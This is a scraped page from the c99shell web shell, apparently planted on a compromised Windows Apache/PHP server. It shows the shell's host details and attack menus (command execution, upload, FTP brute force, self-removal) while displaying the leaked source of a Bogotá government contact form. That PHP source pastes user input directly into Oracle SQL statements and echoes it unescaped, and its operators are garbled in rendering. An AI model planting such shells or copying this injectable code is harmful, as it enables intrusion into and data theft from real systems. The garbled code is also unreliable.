!C99Shell v. 1.0 pre-release build #13!

Software: Apache. PHP/5.5.15 

uname -a: Windows NT SVR-DMZ 6.1 build 7600 (Windows Server 2008 R2 Enterprise Edition) i586 

SYSTEM 

Safe-mode: OFF (not secure)

C:\Extranet\phpscripts\   drwxrwxrwx
Free 4.08 GB of 39.52 GB (10.32%)
Detected drives: [ a ] [ c ] [ d ] [ e ] [ f ]
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     add.php (7.22 KB)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<html>

<head>
<meta name="GENERATOR" content="Microsoft FrontPage 3.0">
<title>Formato de Verificaci&oacute;n y Actualizaci&oacute;n de Informaci&oacute;n de Organizaciones</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<script language="JavaScript" type="text/JavaScript">
<!--


function MM_jumpMenu(targ,selObj,restore){ //v3.0
  eval(targ+".location='"+selObj.options[selObj.selectedIndex].value+"'");
  if (restore) selObj.selectedIndex=0;
}
//-->
</script>
</head>

<body link="#6666FF" vlink="#6666FF" alink="#6666FF" topmargin="0">
<table border="0" width="687" bgcolor="#FFFFFF" cellspacing="0" cellpadding="0"
bordercolor="#FFFFFF">
  <tr>
    <td width="100%" colspan="2"><img src="../ince/encabe4.gif" width="744" height="70"
    alt="encabe.gif (14884 bytes)"></td>
  </tr>
  <tr>
    <td width="50%">&nbsp;</td>
    <td width="50%"><p align="right"><a href="http://www.dama.gov.co"><img src="../ince/back.gif"
    width="73" height="16" alt="Regresar al Home..." align="left" border="0"></a></td>
  </tr>
  <tr>
    <td width="100%" colspan="2"><div align="center"><img src="../ince/empre.gif" width="500" height="69"></div></td>
  </tr>
</table>

<form name="form1" method="post" action="validar.php">
  <p>
  <table border="1" width="687" cellspacing="0" cellpadding="5" bordercolor="#FFFFFF">
    <tr bordercolor="#FFFFFF"> 
      <td colspan="3" valign="top" bgcolor="#333399"><font color="#FF3333">&nbsp;</font></td>
    </tr>
    <tr bordercolor="#FFFFFF"> 
      <td height="0" colspan="3" valign="top"> 
        <p><font size="2" face="Verdana, Arial, Helvetica, sans-serif">Resultado 
          de la creaci&oacute;n de un nuevo contacto para la organizaci&oacute;n:</font></p>
        <table width="100%" border="1" cellpadding="6" bordercolor="#FFF8CE" bgcolor="#FFF8CE">
          <tr>
            <td><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><strong><font color="#FF99CC">&gt;&gt;</font></strong> 
              <font color="#0066CC" size="4">Compa&ntilde;ia Nacional de Chocolates</font></font></td>
          </tr>
        </table>
        <table width="100%" border="1" cellpadding="2" cellspacing="0" bordercolor="#DAEAFE" bgcolor="#D6F4FE">
          <tr> 
            <td height="31" colspan="4"><div align="left">
<?php
$err
=0;
$err3=0;
$err2=0;

$un strlen($nombre);
$do strlen($mail);
$tr strlen($cargo);

if (
$un or $do or $tr 2) {
$err=1;
$txerr="Alguno de los campos que usted ingreso tiene muy pocos caracteres como para ser correcto, por favor intente nuevamente.";
}

if (
$err==1) {
?>
<font size="2" face="Verdana, Arial, Helvetica, sans-serif"><strong>Error: 
                </strong><?php echo $txerr?></font>
<?php
}


// Validación del telefono
$veri strlen($telefono);
if (
$veri or $veri 8) {
$err3=1;
$txerr="El teléfono que usted ingreso, tiene muchos o pocos dígitos, por favor intentelo nuevamente.<BR>";
}
$te 0;
for (
$i 1$i <= 10$i++) {
$veri1 substr_count($telefono$i);
$te $te $veri1;
}
if (
$veri != $te) {
$err3=1;
$txerr="El teléfono que usted ingreso, tiene caracteres no válidos, por favor inténtelo nuevamente.<BR>";
}
if (
$err3==1) {
?>
<p><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><strong>Error: 
                </strong><?php echo $txerr?></font>
<?php
}

// Validación de la identificacion
$veri strlen($id);
if (
$veri or $veri 10) {
$err2=1;
$txerr="La identificación que usted ingreso, tiene muchos o pocos dígitos, por favor intentelo nuevamente.<BR>";
}
$te 0;
for (
$i 1$i <= 10$i++) {
$veri1 substr_count($id$i);
$te $te $veri1;
}
if (
$veri != $te) {
$err2=1;
$txerr="La identificación que usted ingreso, tiene caracteres no válidos, por favor intentelo nuevamente.<BR>";
}
if (
$err2==1) {
?>
<p><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><strong>Error: 
                </strong><?php echo $txerr?></font>
<?php
}

if (
$err==and $err2==and $err3==0) {
require(
'conexion2.php');

$stmt ociparse($c1,"SELECT envista.ESQ_CONTACTO.NEXTVAL FROM DUAL");
$result OCIExecute($stmt);
while (
OCIFetchInto($stmt$value)) {
$consecutivo $value[0];
}
echo 
$consecutivo;
$stmt ociparse($c1,"INSERT INTO envista.CONTACTO
(CONTACTO_ID,                    
NOMBRE,                         
IDENTIFICACION,                
CARGO,                 
TELEFONO,                       
DIRECCION,                      
EMAIL,                                    
INGRESADO_POR,                  
INGRESADO_FECHA_HORA)
VALUES
(
$consecutivo,                   
'
$nombre',                         
'
$id',                
'
$cargo',                         
'
$telefono',                      
'
$dire',                     
'
$mail',                                         
USER,SYSDATE )"
);
$result OCIExecute($stmt);
if (
$result == false) {
?>
<font size="2" face="Verdana, Arial, Helvetica, sans-serif"><strong>Error: 
                </strong>Problemas temporales han impedido elaborar el contacto, por favor intente más tarde.</font>
<?php
}else{

$stmt ociparse($c1,"SELECT envista.ESQ_CONTACTO_OBJ.NEXTVAL FROM DUAL");
$result OCIExecute($stmt);
while (
OCIFetchInto($stmt$value)) {
$consecutivoobj $value[0];
}
$stmt ociparse($c1,"INSERT INTO envista.CONTACTO_OBJ
(COBJETO_ID,             
ROL_ORG,                
EO_ID,                  
CONTACTO_ID,            
INGRESADO_POR,          
INGRESADO_FECHA_HORA)
VALUES
(
$consecutivoobj,            
'
$rol',               
$eoid,                           
$consecutivo,            
USER,SYSDATE )"
);
$result OCIExecute($stmt);
if (
$result == false) {
?>
<font size="2" face="Verdana, Arial, Helvetica, sans-serif"><strong>Error: 
                </strong>Aunque el contacto fué añadido, problemas temporales han impedido relacionar el contacto correctamente, por favor intente más tarde.</font>
<?php
}else{
?>
<font size="2" face="Verdana, Arial, Helvetica, sans-serif"><strong>Gracias: 
                </strong> El contacto de: <b><?php echo $nombre?></b> fue añadido correctamente.</font>
<?php
}

}


}


?>            
             
              </div></td>
          </tr>
        </table> 
      </td>
    </tr>
    <tr bordercolor="#FFFFFF"> 
      <td colspan="3" valign="top" bgcolor="#333399"> 
        <div align="right"></div></td>
    </tr>
    <tr bordercolor="#FFFFFF"> 
      <td width="33%" height="97" valign="top"> 
        <p align="center"><font face="Arial"><small><small><img
    src="../ince/logalc.gif" width="80" height="85" alt="logalc.gif (3822 bytes)"></small></small></font></td>
      <td width="67%" height="97" colspan="2" valign="top"> <p align="center">
          <input name="nit" type="hidden" id="nit" value="<?php echo $nit?>">
          <input type="submit" name="Submit" value="Finalizar...">
        </p>
        <p><font size="1" face="Verdana, Arial, Helvetica, sans-serif">Todos los 
          Derechos Reservados para el DAMA.<br>
          El presente servicio es un producto del Sistema de Informaci&oacute;n 
          del DAMA - SIA<br>
          Bogot&aacute;, 2003.</font></p>
        </td>
    </tr>
  </table>
</form>
<p>&nbsp;</p>
</body>
</html>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 1.0 pre-release build #13 powered by Captain Crunch Security Team | http://ccteam.ru | Generation time: 0.0312 ]--